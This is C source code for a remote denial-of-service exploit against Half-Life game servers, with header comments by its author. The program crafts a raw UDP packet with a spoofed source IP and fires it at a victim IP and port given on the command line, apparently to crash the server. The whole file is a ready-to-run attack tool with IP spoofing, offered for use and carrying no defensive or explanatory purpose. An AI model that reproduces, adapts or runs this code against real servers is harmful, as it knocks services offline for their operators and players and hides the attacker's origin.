m00-omfg-HL-again.c

/*
 *   m00-HL-again.c
 *
 * Remote DoS exploit for ALL HalfLife server versions
 * (without steam) includeing the patched one + IP spoofing support.
 * 
 * Counter-Strike must die.
 *
 * d4rkgr3y / m00.0x333.org / m00@irc.blackhat.ru
 *
*/


#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <stdio.h>

main(int argc,char **argv) {
	int fd;
	int i;
	struct sockaddr sa;
	struct sockaddr_in *p;
	struct hostent *he;
	u_char gram[]= {
		0x45,	0x00,	0x00,	0x26,
		0x12,	0x34,	0x00,	0x00,
		0xFF,	0x11,	0x00,	0x00,
		0x00,	0x00,	0x00,	0x00,
		0x00,	0x00,	0x00,	0x00,
		0x00,	0x00,	0x00,	0x00,
		0x00,	0x12,	0x00,	0x00,
		0xFF,	0xFF,	0xFF,	0xFF,
		0x00,	0x00,	0x00,	0x00,
		0x00
	};

	/* code ripped from my m00-cha0s.c */
	/* im too lazy to code smth new    */
	
	printf("\nm00-HL-again.c ~ read the header bitch\nInternal m00 release. Do not distribute.\n\n");

	if(argc!=5) { printf("Usage: %s <victim ip> <victim port> <source ip> <source port>\n\n",argv[0]); exit(1); }



	if((he=gethostbyname(argv[3]))==NULL) {
		perror("[-] gethostbyname() #1");
		exit(0);
	}
	
	bcopy(*(he->h_addr_list),(gram+12),4);
	printf("[*] Attacking host %s ... ",argv[1]);

	if((he=gethostbyname(argv[1]))==NULL) {
		perror("[-] gethostbyname() #2");
		exit(0);
	}
		
	bcopy(*(he->h_addr_list),(gram+16),4);

	*(u_short*)(gram+20)=htons((u_short)atoi(argv[4]));
	*(u_short*)(gram+22)=htons((u_short)atoi(argv[2]));

	p=(struct sockaddr_in*)&sa;
	p->sin_family=AF_INET;
	bcopy(*(he->h_addr_list),&(p->sin_addr),sizeof(struct in_addr));

	if((fd=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))== -1) {
		perror("failed\n[-] socket()");
		exit(0);
	}

	if((sendto(fd,&gram,sizeof(gram),0,(struct sockaddr*)p,sizeof(struct sockaddr)))==-1) {
		perror("failed\n[-] sendto()");
		exit(0);
	}
	
	printf("done\n");

}